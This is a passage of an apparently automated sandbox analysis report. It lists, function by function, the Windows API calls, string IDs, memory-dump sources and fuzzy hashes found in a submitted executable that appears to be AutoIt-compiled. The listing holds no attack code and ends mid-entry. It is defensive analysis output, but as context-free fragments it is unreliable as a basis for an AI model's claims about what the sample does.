            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,010011D9), ref: 01001648
            • OpenProcessToken.ADVAPI32(00000000,?,?,?,010011D9), ref: 0100164F
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CurrentOpenProcessThreadToken
            • String ID:
            • API String ID: 3974789173-0
            • Opcode ID: 49b9439d9e465a92d935cc318c46c6d0fcd927680aa5357c3c24b24bd2b9f6b9
            • Instruction ID: 1017b68610f2ecbeecca109a9ae64ca5af65865275d7350cb7bd77610982077e
            • Opcode Fuzzy Hash: 49b9439d9e465a92d935cc318c46c6d0fcd927680aa5357c3c24b24bd2b9f6b9
            • Instruction Fuzzy Hash: E8E08636601211ABF7701FA49F0DB867BBDAF45791F144849F2C5E9084D7398044C750
            APIs
            • GetDesktopWindow.USER32 ref: 00FFD858
            • GetDC.USER32(00000000), ref: 00FFD862
            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00FFD882
            • ReleaseDC.USER32(?), ref: 00FFD8A3
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CapsDesktopDeviceReleaseWindow
            • String ID:
            • API String ID: 2889604237-0
            • Opcode ID: aee49924fcb9c4fc64c2457d1611a4194ce8fcf658088e342813794c94e1edd1
            • Instruction ID: 61c30c84e30561e46ef8c4d55d40bc22f859cb17649f1a3d96daa737d04afb9c
            • Opcode Fuzzy Hash: aee49924fcb9c4fc64c2457d1611a4194ce8fcf658088e342813794c94e1edd1
            • Instruction Fuzzy Hash: CAE01AB5800204DFDB51AFA0D60C66DBBBAFB08310F10800AF886F7254C73E9901BF50
            APIs
            • GetDesktopWindow.USER32 ref: 00FFD86C
            • GetDC.USER32(00000000), ref: 00FFD876
            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00FFD882
            • ReleaseDC.USER32(?), ref: 00FFD8A3
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CapsDesktopDeviceReleaseWindow
            • String ID:
            • API String ID: 2889604237-0
            • Opcode ID: 50d3188e558ac80316e17aaf28cfa4640d5f135fbbc23324bbd0f3c32e858d83
            • Instruction ID: 06312d4585edb2a85445dffa100523afb0999a51a29adf9ae52523176b5194c4
            • Opcode Fuzzy Hash: 50d3188e558ac80316e17aaf28cfa4640d5f135fbbc23324bbd0f3c32e858d83
            • Instruction Fuzzy Hash: 35E09AB5800604DFDB61AFA1D54C66DBBB9BB08311F14844AF986F7254D73D6901AF50
            APIs
              • Part of subcall function 00FA7620: _wcslen.LIBCMT ref: 00FA7625
            • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 01014ED4
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Connection_wcslen
            • String ID: *$LPT
            • API String ID: 1725874428-3443410124
            • Opcode ID: 050abfdc18c6658c52439f3cd51192f12fc17cd944ca41fd02ca4d0e9d570ee8
            • Instruction ID: 5eca0da879f2d026ed517ad32434d8eb1100abfee5ec26e0a31d104fc2258d42
            • Opcode Fuzzy Hash: 050abfdc18c6658c52439f3cd51192f12fc17cd944ca41fd02ca4d0e9d570ee8
            • Instruction Fuzzy Hash: AE919075A002049FDB15DF58C884EAABBF1AF45304F1980DDE84A9F3A6C739ED85CB90
            APIs
            • __startOneArgErrorHandling.LIBCMT ref: 00FCE30D
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ErrorHandling__start
            • String ID: pow
            • API String ID: 3213639722-2276729525
            • Opcode ID: 27924e32545259f5fbdd5395a28778df0c84da0993e0524decf69b9d4db564a5
            • Instruction ID: f10aee7e185f076963cd76ccc57f357aba3402f4bfc2d936032108cfc4663faf
            • Opcode Fuzzy Hash: 27924e32545259f5fbdd5395a28778df0c84da0993e0524decf69b9d4db564a5
            • Instruction Fuzzy Hash: A3515A71E0C30396CB257714DB43BBA3B969B40760F28496EE0D54A399FB398C85BA46
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID:
            • String ID: #
            • API String ID: 0-1885708031
            • Opcode ID: ba0cf93afb63e9c0ca52887d6dcffa9b0cd8ac4467f7cb03163d6d2d4b7f7a6a
            • Instruction ID: 3f676cc58469b6e22fb415579bd4665bef81359d085d43490eb06ac1a8336cc7
            • Opcode Fuzzy Hash: ba0cf93afb63e9c0ca52887d6dcffa9b0cd8ac4467f7cb03163d6d2d4b7f7a6a
            • Instruction Fuzzy Hash: 79512776D0424ADFDB15EF28C4816FA7BA4EF55320F244065FDA19B2E0D7389D42EB90
            APIs
            • Sleep.KERNEL32(00000000), ref: 00FBF2A2
            • GlobalMemoryStatusEx.KERNEL32(?), ref: 00FBF2BB
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: GlobalMemorySleepStatus
            • String ID: @
            • API String ID: 2783356886-2766056989
            • Opcode ID: bccdeb091e001b34a05bb84687a4349cef5ae9e5bd8f72692874b65be8ad372d
            • Instruction ID: 19fd029b93cb1faf630ae98cbb086f7502546fe38e90637e31559e18df074979
            • Opcode Fuzzy Hash: bccdeb091e001b34a05bb84687a4349cef5ae9e5bd8f72692874b65be8ad372d
            • Instruction Fuzzy Hash: 7A5135B15187449FD320AF10DC86BABBBF8FF85300F81885DF1D942195EB758529CB66
            APIs
            • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 010257E0
            • _wcslen.LIBCMT ref: 010257EC
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: BuffCharUpper_wcslen
            • String ID: CALLARGARRAY
            • API String ID: 157775604-1150593374
            • Opcode ID: beb75a7ca72eab080091319ec44cc393a02b3e18cd430f99026dc349728d0824
            • Instruction ID: da0b2f91401827f335ca4e7c32569299ae7f183cbf645b290a4520cdcf795cd0
            • Opcode Fuzzy Hash: beb75a7ca72eab080091319ec44cc393a02b3e18cd430f99026dc349728d0824
            • Instruction Fuzzy Hash: 4D41B075E002199FCB04DFA9CC818FEBBF5FF49320F104069E545A7292E7B59981CB90
            APIs
            • _wcslen.LIBCMT ref: 0101D130
            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0101D13A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CrackInternet_wcslen
            • String ID: |
            • API String ID: 596671847-2343686810
            • Opcode ID: 12fc135f30fd3a2697ce00c6892b125e5df1664ac74aa54d33d68e52bd6dc1c6
            • Instruction ID: 6eaa72a6996f868b518adf9399ce46080ee42db064e54f46b61c9d9ec67adf75
            • Opcode Fuzzy Hash: 12fc135f30fd3a2697ce00c6892b125e5df1664ac74aa54d33d68e52bd6dc1c6
            • Instruction Fuzzy Hash: 1D312C75D00219ABDF15EFE4CC85AEEBFB9FF05300F000059F915A6166D739AA06DB54
            APIs
            • DestroyWindow.USER32(?,?,?,?), ref: 01033621
            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0103365C
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Window$DestroyMove
            • String ID: static
            • API String ID: 2139405536-2160076837
            • Opcode ID: 7ff539629eb4d9b4016cca31e8965d9eb6a91e4917fe86270635fa5e89eb59e0
            • Instruction ID: 007d40ca174831cf89e1d05163074d6095feed375207b3f4ad4943ba4e87d1cc
            • Opcode Fuzzy Hash: 7ff539629eb4d9b4016cca31e8965d9eb6a91e4917fe86270635fa5e89eb59e0
            • Instruction Fuzzy Hash: 5F317071110604AEEB259F68DC80EFB73ADFF88764F00961DF9A5D7280DA35A891D760
            APIs
            • SendMessageW.USER32(?,00001132,00000000,?), ref: 0103461F
            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 01034634
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: MessageSend
            • String ID: '
            • API String ID: 3850602802-1997036262
            • Opcode ID: cb9f47b0909f9b4310fd6fb2b27f82e9d37c80d11914a854f7dc1a7f9cbe7edc
            • Instruction ID: 4d577047159fbbf5849d7b5b7d53f3adbdf6e7255d9cc1107561e0833e641854
            • Opcode Fuzzy Hash: cb9f47b0909f9b4310fd6fb2b27f82e9d37c80d11914a854f7dc1a7f9cbe7edc
            • Instruction Fuzzy Hash: 02310774E01209DFDB14CF69C981BDA7BB9FB49300F14416AE945EB382D771A945CF90
            APIs
            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0103327C
            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01033287
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: MessageSend
            • String ID: Combobox
            • API String ID: 3850602802-2096851135
            • Opcode ID: 70f401b0f0060bc61f7e220d6477d835dc14e1bf4615ee2f47a7417bb5fc2135
            • Instruction ID: b7b3aa9fcd8e31ed5a9ff6c368152f3c452514a66d0cbb9e8bebfdd1cee15d35
            • Opcode Fuzzy Hash: 70f401b0f0060bc61f7e220d6477d835dc14e1bf4615ee2f47a7417bb5fc2135
            • Instruction Fuzzy Hash: 9611D3713001086FFF629E58DCC0EAB379EEB88364F104229F5549B291D6359C50C760
            APIs
              • Part of subcall function 00FA600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00FA604C
              • Part of subcall function 00FA600E: GetStockObject.GDI32(00000011), ref: 00FA6060
              • Part of subcall function 00FA600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FA606A
            • GetWindowRect.USER32(00000000,?), ref: 0103377A
            • GetSysColor.USER32(00000012), ref: 01033794
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Window$ColorCreateMessageObjectRectSendStock
            • String ID: static
            • API String ID: 1983116058-2160076837
            • Opcode ID: c398ba7db32ace89747de5abee0bac03779d95dc6d0b1a019ad948c1ad5afc37
            • Instruction ID: 18afa77f3b69564442906d6852cf553cac42cbcff900d8679e46cccc0dd04773
            • Opcode Fuzzy Hash: c398ba7db32ace89747de5abee0bac03779d95dc6d0b1a019ad948c1ad5afc37
            • Instruction Fuzzy Hash: 58113AB2610209AFEF11DFA8CC45EFA7BF8FB48314F004919F995E6240D739E8509B50
            APIs
            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0101CD7D
            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0101CDA6
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Internet$OpenOption
            • String ID: <local>
            • API String ID: 942729171-4266983199
            • Opcode ID: 178e5d75c174bc8a587472126eecc447ddef148b2ed2b8df3c8a263492d3e1a8
            • Instruction ID: 85072a42dc4f015fc2537977f5b2e9292264aba62e0970d19851122ac0da719a
            • Opcode Fuzzy Hash: 178e5d75c174bc8a587472126eecc447ddef148b2ed2b8df3c8a263492d3e1a8
            • Instruction Fuzzy Hash: 561129712816317AF7755A668D44FF7BEACEF026A4F80425AF189D3084D378D440C6F0
            APIs
            • GetWindowTextLengthW.USER32(00000000), ref: 010334AB
            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 010334BA
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: LengthMessageSendTextWindow
            • String ID: edit
            • API String ID: 2978978980-2167791130
            • Opcode ID: 7bba42561e21b28337aa278eeab29ec67a5577d968a4bb13fc83c5f8374a963c
            • Instruction ID: 62efbdba790ddf7fd30ee2ccab33998558780ea76dc0396e8a10b94fb394d7bd
            • Opcode Fuzzy Hash: 7bba42561e21b28337aa278eeab29ec67a5577d968a4bb13fc83c5f8374a963c
            • Instruction Fuzzy Hash: F811BF75100108ABEB624F68DC84AEB37AEFB85374F504324F9A0EB1D4CB35EC919750
            APIs
              • Part of subcall function 00FA9CB3: _wcslen.LIBCMT ref: 00FA9CBD
            • CharUpperBuffW.USER32(?,?,?), ref: 01006CB6
            • _wcslen.LIBCMT ref: 01006CC2
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: _wcslen$BuffCharUpper
            • String ID: STOP
            • API String ID: 1256254125-2411985666
            • Opcode ID: 2a3fe9cf95ef07e7c546861cf321b9fdf3f29578eb4da002547186034cff4247
            • Instruction ID: 4dca80114d3a6dd7fdc10e35498f830d9c46efeffcd1d2f5ae1698d499b9620a
            • Opcode Fuzzy Hash: 2a3fe9cf95ef07e7c546861cf321b9fdf3f29578eb4da002547186034cff4247
            • Instruction Fuzzy Hash: 3F010432D0052B8BEB22AFBDDC80DBF37E6EA51610F000579E892961C1EB37D460C650
            APIs
              • Part of subcall function 00FA9CB3: _wcslen.LIBCMT ref: 00FA9CBD
              • Part of subcall function 01003CA7: GetClassNameW.USER32(?,?,000000FF), ref: 01003CCA
            • SendMessageW.USER32(?,00000180,00000000,?), ref: 01001C46
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ClassMessageNameSend_wcslen
            • String ID: ComboBox$ListBox
            • API String ID: 624084870-1403004172
            • Opcode ID: cc61763d604658ee4931b70d58aac9aac065317816f79a7875412101ea7b0f6d
            • Instruction ID: 780933cd2cbfab8982994bb1df006fa767375e9e235a4af6daf1bc04aa5d9a95
            • Opcode Fuzzy Hash: cc61763d604658ee4931b70d58aac9aac065317816f79a7875412101ea7b0f6d
            • Instruction Fuzzy Hash: 3101F7B164011D6BEB0AEB90CE51DFF77EC9B12380F000029A586672C1EA74EA4897B1
            APIs
              • Part of subcall function 00FA9CB3: _wcslen.LIBCMT ref: 00FA9CBD
              • Part of subcall function 01003CA7: GetClassNameW.USER32(?,?,000000FF), ref: 01003CCA
            • SendMessageW.USER32(?,00000182,?,00000000), ref: 01001CC8
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ClassMessageNameSend_wcslen
            • String ID: ComboBox$ListBox
            • API String ID: 624084870-1403004172
            • Opcode ID: cb7b7c39de4b905ee78bd5b3cfd17a57f50dedba3989d5496379673a40f4ec4f
            • Instruction ID: ed34903b05fc3718b86af2a44b31eb9744178b0a398fb8f4cfcd4613f597d878
            • Opcode Fuzzy Hash: cb7b7c39de4b905ee78bd5b3cfd17a57f50dedba3989d5496379673a40f4ec4f
            • Instruction Fuzzy Hash: 4A01A7B164011D67EB16E795CE11EFE77EC9B12380F540025A881A72C1EA75DA089671
            APIs
              • Part of subcall function 00FA9CB3: _wcslen.LIBCMT ref: 00FA9CBD
              • Part of subcall function 01003CA7: GetClassNameW.USER32(?,?,000000FF), ref: 01003CCA
            • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 01001DD3
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ClassMessageNameSend_wcslen
            • String ID: ComboBox$ListBox
            • API String ID: 624084870-1403004172
            • Opcode ID: 51685a4d17c763f3b78b0ce647784e3e296c18c6c3a92b3be82f2ad5fdc0b5e4
            • Instruction ID: a64c77b5a3f93db98286f1e049bcc68f65db007c1588f8fcb61c505af8b50162
            • Opcode Fuzzy Hash: 51685a4d17c763f3b78b0ce647784e3e296c18c6c3a92b3be82f2ad5fdc0b5e4
            • Instruction Fuzzy Hash: C6F0F971A4022966E705F7A4CC51EFF77ACAB02390F44091AB4A2A72C1DA7495088661
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: _wcslen
            • String ID: 3, 3, 16, 1
            • API String ID: 176396367-3042988571
            • Opcode ID: 3501db1f8767f8991e9b47fe8249ee26e75d26299e9f7ae377e1f4eba24a2f4a
            • Instruction ID: dbba963ae8d8c3aaf5cb14b9f5187037739344b62b9334545dbcd63e909f4c6c
            • Opcode Fuzzy Hash: 3501db1f8767f8991e9b47fe8249ee26e75d26299e9f7ae377e1f4eba24a2f4a
